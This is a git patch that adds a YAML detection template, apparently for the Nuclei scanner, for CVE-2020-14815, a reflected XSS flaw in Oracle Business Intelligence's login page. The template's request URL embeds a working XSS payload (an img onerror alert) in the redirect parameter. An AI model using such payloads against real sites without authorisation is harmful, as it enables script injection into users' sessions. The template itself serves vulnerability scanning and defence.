From a998ecd4d2dd99fdbf0638742a5e8b6d1362b277 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Feb 2021 16:03:30 +0000 Subject: [PATCH] Create CVE-2020-14815.yaml (#836) --- cves/2020/CVE-2020-14815.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-14815.yaml diff --git a/cves/2020/CVE-2020-14815.yaml b/cves/2020/CVE-2020-14815.yaml new file mode 100644 index 0000000000..e8b590b0f3 --- /dev/null +++ b/cves/2020/CVE-2020-14815.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14815 + +info: + name: Oracle Business Intelligence XSS + author: pikpikcu + severity: medium + reference: https://www.oracle.com/security-alerts/cpuoct2020.html + tags: cve,cve2020,oracle,xss + + # https://twitter.com/HackerOn2Wheels/status/1326927875279380480 + +requests: + - method: GET + path: + - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "X-Oracle-Dms-Ecid:" + - "X-Oracle-Dms-Rid:" + part: header